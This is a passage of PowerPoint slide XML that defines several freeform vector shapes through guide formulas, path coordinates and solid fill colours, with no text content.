                  <a:gd name="T58" fmla="*/ 25 w 249"/>
                  <a:gd name="T59" fmla="*/ 151 h 209"/>
                  <a:gd name="T60" fmla="*/ 25 w 249"/>
                  <a:gd name="T61" fmla="*/ 28 h 209"/>
                  <a:gd name="T62" fmla="*/ 26 w 249"/>
                  <a:gd name="T63" fmla="*/ 27 h 209"/>
                  <a:gd name="T64" fmla="*/ 28 w 249"/>
                  <a:gd name="T65" fmla="*/ 26 h 209"/>
                  <a:gd name="T66" fmla="*/ 32 w 249"/>
                  <a:gd name="T67" fmla="*/ 25 h 209"/>
                  <a:gd name="T68" fmla="*/ 36 w 249"/>
                  <a:gd name="T69" fmla="*/ 24 h 209"/>
                  <a:gd name="T70" fmla="*/ 42 w 249"/>
                  <a:gd name="T71" fmla="*/ 22 h 209"/>
                  <a:gd name="T72" fmla="*/ 49 w 249"/>
                  <a:gd name="T73" fmla="*/ 22 h 209"/>
                  <a:gd name="T74" fmla="*/ 57 w 249"/>
                  <a:gd name="T75" fmla="*/ 24 h 209"/>
                  <a:gd name="T76" fmla="*/ 68 w 249"/>
                  <a:gd name="T77" fmla="*/ 27 h 20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49"/>
                  <a:gd name="T118" fmla="*/ 0 h 209"/>
                  <a:gd name="T119" fmla="*/ 249 w 249"/>
                  <a:gd name="T120" fmla="*/ 209 h 20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49" h="209">
                    <a:moveTo>
                      <a:pt x="68" y="27"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="70" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="27"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10766" name="Freeform 173"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1878" y="2317"/>
                <a:ext cx="80" cy="92"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 79 w 80"/>
                  <a:gd name="T1" fmla="*/ 4 h 92"/>
                  <a:gd name="T2" fmla="*/ 79 w 80"/>
                  <a:gd name="T3" fmla="*/ 4 h 92"/>
                  <a:gd name="T4" fmla="*/ 77 w 80"/>
                  <a:gd name="T5" fmla="*/ 4 h 92"/>
                  <a:gd name="T6" fmla="*/ 75 w 80"/>
                  <a:gd name="T7" fmla="*/ 3 h 92"/>
                  <a:gd name="T8" fmla="*/ 73 w 80"/>
                  <a:gd name="T9" fmla="*/ 3 h 92"/>
                  <a:gd name="T10" fmla="*/ 69 w 80"/>
                  <a:gd name="T11" fmla="*/ 2 h 92"/>
                  <a:gd name="T12" fmla="*/ 66 w 80"/>
                  <a:gd name="T13" fmla="*/ 2 h 92"/>
                  <a:gd name="T14" fmla="*/ 61 w 80"/>
                  <a:gd name="T15" fmla="*/ 2 h 92"/>
                  <a:gd name="T16" fmla="*/ 56 w 80"/>
                  <a:gd name="T17" fmla="*/ 0 h 92"/>
                  <a:gd name="T18" fmla="*/ 51 w 80"/>
                  <a:gd name="T19" fmla="*/ 0 h 92"/>
                  <a:gd name="T20" fmla="*/ 45 w 80"/>
                  <a:gd name="T21" fmla="*/ 2 h 92"/>
                  <a:gd name="T22" fmla="*/ 39 w 80"/>
                  <a:gd name="T23" fmla="*/ 2 h 92"/>
                  <a:gd name="T24" fmla="*/ 32 w 80"/>
                  <a:gd name="T25" fmla="*/ 3 h 92"/>
                  <a:gd name="T26" fmla="*/ 26 w 80"/>
                  <a:gd name="T27" fmla="*/ 4 h 92"/>
                  <a:gd name="T28" fmla="*/ 19 w 80"/>
                  <a:gd name="T29" fmla="*/ 6 h 92"/>
                  <a:gd name="T30" fmla="*/ 12 w 80"/>
                  <a:gd name="T31" fmla="*/ 9 h 92"/>
                  <a:gd name="T32" fmla="*/ 5 w 80"/>
                  <a:gd name="T33" fmla="*/ 12 h 92"/>
                  <a:gd name="T34" fmla="*/ 5 w 80"/>
                  <a:gd name="T35" fmla="*/ 13 h 92"/>
                  <a:gd name="T36" fmla="*/ 4 w 80"/>
                  <a:gd name="T37" fmla="*/ 18 h 92"/>
                  <a:gd name="T38" fmla="*/ 2 w 80"/>
                  <a:gd name="T39" fmla="*/ 26 h 92"/>
                  <a:gd name="T40" fmla="*/ 0 w 80"/>
                  <a:gd name="T41" fmla="*/ 36 h 92"/>
                  <a:gd name="T42" fmla="*/ 0 w 80"/>
                  <a:gd name="T43" fmla="*/ 47 h 92"/>
                  <a:gd name="T44" fmla="*/ 0 w 80"/>
                  <a:gd name="T45" fmla="*/ 61 h 92"/>
                  <a:gd name="T46" fmla="*/ 3 w 80"/>
                  <a:gd name="T47" fmla="*/ 75 h 92"/>
                  <a:gd name="T48" fmla="*/ 6 w 80"/>
                  <a:gd name="T49" fmla="*/ 89 h 92"/>
                  <a:gd name="T50" fmla="*/ 7 w 80"/>
                  <a:gd name="T51" fmla="*/ 89 h 92"/>
                  <a:gd name="T52" fmla="*/ 9 w 80"/>
                  <a:gd name="T53" fmla="*/ 89 h 92"/>
                  <a:gd name="T54" fmla="*/ 10 w 80"/>
                  <a:gd name="T55" fmla="*/ 89 h 92"/>
                  <a:gd name="T56" fmla="*/ 12 w 80"/>
                  <a:gd name="T57" fmla="*/ 89 h 92"/>
                  <a:gd name="T58" fmla="*/ 16 w 80"/>
                  <a:gd name="T59" fmla="*/ 88 h 92"/>
                  <a:gd name="T60" fmla="*/ 19 w 80"/>
                  <a:gd name="T61" fmla="*/ 88 h 92"/>
                  <a:gd name="T62" fmla="*/ 23 w 80"/>
                  <a:gd name="T63" fmla="*/ 88 h 92"/>
                  <a:gd name="T64" fmla="*/ 27 w 80"/>
                  <a:gd name="T65" fmla="*/ 88 h 92"/>
                  <a:gd name="T66" fmla="*/ 33 w 80"/>
                  <a:gd name="T67" fmla="*/ 88 h 92"/>
                  <a:gd name="T68" fmla="*/ 39 w 80"/>
                  <a:gd name="T69" fmla="*/ 88 h 92"/>
                  <a:gd name="T70" fmla="*/ 45 w 80"/>
                  <a:gd name="T71" fmla="*/ 88 h 92"/>
                  <a:gd name="T72" fmla="*/ 51 w 80"/>
                  <a:gd name="T73" fmla="*/ 88 h 92"/>
                  <a:gd name="T74" fmla="*/ 58 w 80"/>
                  <a:gd name="T75" fmla="*/ 89 h 92"/>
                  <a:gd name="T76" fmla="*/ 65 w 80"/>
                  <a:gd name="T77" fmla="*/ 89 h 92"/>
                  <a:gd name="T78" fmla="*/ 72 w 80"/>
                  <a:gd name="T79" fmla="*/ 90 h 92"/>
                  <a:gd name="T80" fmla="*/ 80 w 80"/>
                  <a:gd name="T81" fmla="*/ 92 h 92"/>
                  <a:gd name="T82" fmla="*/ 80 w 80"/>
                  <a:gd name="T83" fmla="*/ 89 h 92"/>
                  <a:gd name="T84" fmla="*/ 79 w 80"/>
                  <a:gd name="T85" fmla="*/ 82 h 92"/>
                  <a:gd name="T86" fmla="*/ 77 w 80"/>
                  <a:gd name="T87" fmla="*/ 71 h 92"/>
                  <a:gd name="T88" fmla="*/ 76 w 80"/>
                  <a:gd name="T89" fmla="*/ 58 h 92"/>
                  <a:gd name="T90" fmla="*/ 76 w 80"/>
                  <a:gd name="T91" fmla="*/ 44 h 92"/>
                  <a:gd name="T92" fmla="*/ 76 w 80"/>
                  <a:gd name="T93" fmla="*/ 30 h 92"/>
                  <a:gd name="T94" fmla="*/ 77 w 80"/>
                  <a:gd name="T95" fmla="*/ 16 h 92"/>
                  <a:gd name="T96" fmla="*/ 79 w 80"/>
                  <a:gd name="T97" fmla="*/ 4 h 9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0"/>
                  <a:gd name="T148" fmla="*/ 0 h 92"/>
                  <a:gd name="T149" fmla="*/ 80 w 80"/>
                  <a:gd name="T150" fmla="*/ 92 h 9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0" h="92">
                    <a:moveTo>
                      <a:pt x="79" y="4"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="79" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="4"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10767" name="Freeform 174"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1887" y="2343"/>
                <a:ext cx="131" cy="90"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 131"/>
                  <a:gd name="T1" fmla="*/ 68 h 90"/>
                  <a:gd name="T2" fmla="*/ 0 w 131"/>
                  <a:gd name="T3" fmla="*/ 78 h 90"/>
                  <a:gd name="T4" fmla="*/ 86 w 131"/>
                  <a:gd name="T5" fmla="*/ 90 h 90"/>
                  <a:gd name="T6" fmla="*/ 86 w 131"/>
                  <a:gd name="T7" fmla="*/ 90 h 90"/>
                  <a:gd name="T8" fmla="*/ 88 w 131"/>
                  <a:gd name="T9" fmla="*/ 89 h 90"/>
                  <a:gd name="T10" fmla="*/ 91 w 131"/>
                  <a:gd name="T11" fmla="*/ 88 h 90"/>
                  <a:gd name="T12" fmla="*/ 94 w 131"/>
                  <a:gd name="T13" fmla="*/ 85 h 90"/>
                  <a:gd name="T14" fmla="*/ 98 w 131"/>
                  <a:gd name="T15" fmla="*/ 83 h 90"/>
                  <a:gd name="T16" fmla="*/ 102 w 131"/>
                  <a:gd name="T17" fmla="*/ 80 h 90"/>
                  <a:gd name="T18" fmla="*/ 107 w 131"/>
                  <a:gd name="T19" fmla="*/ 75 h 90"/>
                  <a:gd name="T20" fmla="*/ 112 w 131"/>
                  <a:gd name="T21" fmla="*/ 71 h 90"/>
                  <a:gd name="T22" fmla="*/ 116 w 131"/>
                  <a:gd name="T23" fmla="*/ 66 h 90"/>
                  <a:gd name="T24" fmla="*/ 121 w 131"/>
                  <a:gd name="T25" fmla="*/ 60 h 90"/>
                  <a:gd name="T26" fmla="*/ 124 w 131"/>
                  <a:gd name="T27" fmla="*/ 54 h 90"/>
                  <a:gd name="T28" fmla="*/ 128 w 131"/>
                  <a:gd name="T29" fmla="*/ 47 h 90"/>
                  <a:gd name="T30" fmla="*/ 130 w 131"/>
                  <a:gd name="T31" fmla="*/ 40 h 90"/>
                  <a:gd name="T32" fmla="*/ 131 w 131"/>
                  <a:gd name="T33" fmla="*/ 32 h 90"/>
                  <a:gd name="T34" fmla="*/ 131 w 131"/>
                  <a:gd name="T35" fmla="*/ 22 h 90"/>
                  <a:gd name="T36" fmla="*/ 129 w 131"/>
                  <a:gd name="T37" fmla="*/ 13 h 90"/>
                  <a:gd name="T38" fmla="*/ 129 w 131"/>
                  <a:gd name="T39" fmla="*/ 13 h 90"/>
                  <a:gd name="T40" fmla="*/ 128 w 131"/>
                  <a:gd name="T41" fmla="*/ 11 h 90"/>
                  <a:gd name="T42" fmla="*/ 127 w 131"/>
                  <a:gd name="T43" fmla="*/ 10 h 90"/>
                  <a:gd name="T44" fmla="*/ 126 w 131"/>
                  <a:gd name="T45" fmla="*/ 7 h 90"/>
                  <a:gd name="T46" fmla="*/ 123 w 131"/>
                  <a:gd name="T47" fmla="*/ 4 h 90"/>
                  <a:gd name="T48" fmla="*/ 120 w 131"/>
                  <a:gd name="T49" fmla="*/ 3 h 90"/>
                  <a:gd name="T50" fmla="*/ 116 w 131"/>
                  <a:gd name="T51" fmla="*/ 0 h 90"/>
                  <a:gd name="T52" fmla="*/ 113 w 131"/>
                  <a:gd name="T53" fmla="*/ 0 h 90"/>
                  <a:gd name="T54" fmla="*/ 113 w 131"/>
                  <a:gd name="T55" fmla="*/ 1 h 90"/>
                  <a:gd name="T56" fmla="*/ 114 w 131"/>
                  <a:gd name="T57" fmla="*/ 5 h 90"/>
                  <a:gd name="T58" fmla="*/ 116 w 131"/>
                  <a:gd name="T59" fmla="*/ 12 h 90"/>
                  <a:gd name="T60" fmla="*/ 117 w 131"/>
                  <a:gd name="T61" fmla="*/ 19 h 90"/>
                  <a:gd name="T62" fmla="*/ 117 w 131"/>
                  <a:gd name="T63" fmla="*/ 29 h 90"/>
                  <a:gd name="T64" fmla="*/ 116 w 131"/>
                  <a:gd name="T65" fmla="*/ 40 h 90"/>
                  <a:gd name="T66" fmla="*/ 114 w 131"/>
                  <a:gd name="T67" fmla="*/ 52 h 90"/>
                  <a:gd name="T68" fmla="*/ 108 w 131"/>
                  <a:gd name="T69" fmla="*/ 63 h 90"/>
                  <a:gd name="T70" fmla="*/ 108 w 131"/>
                  <a:gd name="T71" fmla="*/ 63 h 90"/>
                  <a:gd name="T72" fmla="*/ 108 w 131"/>
                  <a:gd name="T73" fmla="*/ 64 h 90"/>
                  <a:gd name="T74" fmla="*/ 107 w 131"/>
                  <a:gd name="T75" fmla="*/ 64 h 90"/>
                  <a:gd name="T76" fmla="*/ 106 w 131"/>
                  <a:gd name="T77" fmla="*/ 66 h 90"/>
                  <a:gd name="T78" fmla="*/ 105 w 131"/>
                  <a:gd name="T79" fmla="*/ 67 h 90"/>
                  <a:gd name="T80" fmla="*/ 102 w 131"/>
                  <a:gd name="T81" fmla="*/ 68 h 90"/>
                  <a:gd name="T82" fmla="*/ 100 w 131"/>
                  <a:gd name="T83" fmla="*/ 69 h 90"/>
                  <a:gd name="T84" fmla="*/ 98 w 131"/>
                  <a:gd name="T85" fmla="*/ 70 h 90"/>
                  <a:gd name="T86" fmla="*/ 95 w 131"/>
                  <a:gd name="T87" fmla="*/ 70 h 90"/>
                  <a:gd name="T88" fmla="*/ 92 w 131"/>
                  <a:gd name="T89" fmla="*/ 71 h 90"/>
                  <a:gd name="T90" fmla="*/ 89 w 131"/>
                  <a:gd name="T91" fmla="*/ 73 h 90"/>
                  <a:gd name="T92" fmla="*/ 85 w 131"/>
                  <a:gd name="T93" fmla="*/ 73 h 90"/>
                  <a:gd name="T94" fmla="*/ 81 w 131"/>
                  <a:gd name="T95" fmla="*/ 73 h 90"/>
                  <a:gd name="T96" fmla="*/ 78 w 131"/>
                  <a:gd name="T97" fmla="*/ 73 h 90"/>
                  <a:gd name="T98" fmla="*/ 73 w 131"/>
                  <a:gd name="T99" fmla="*/ 73 h 90"/>
                  <a:gd name="T100" fmla="*/ 68 w 131"/>
                  <a:gd name="T101" fmla="*/ 71 h 90"/>
                  <a:gd name="T102" fmla="*/ 68 w 131"/>
                  <a:gd name="T103" fmla="*/ 83 h 90"/>
                  <a:gd name="T104" fmla="*/ 3 w 131"/>
                  <a:gd name="T105" fmla="*/ 76 h 90"/>
                  <a:gd name="T106" fmla="*/ 1 w 131"/>
                  <a:gd name="T107" fmla="*/ 68 h 9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1"/>
                  <a:gd name="T163" fmla="*/ 0 h 90"/>
                  <a:gd name="T164" fmla="*/ 131 w 131"/>
                  <a:gd name="T165" fmla="*/ 90 h 9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1" h="90">
                    <a:moveTo>
                      <a:pt x="1" y="68"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="68"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="99D8D8"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10768" name="Freeform 175"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
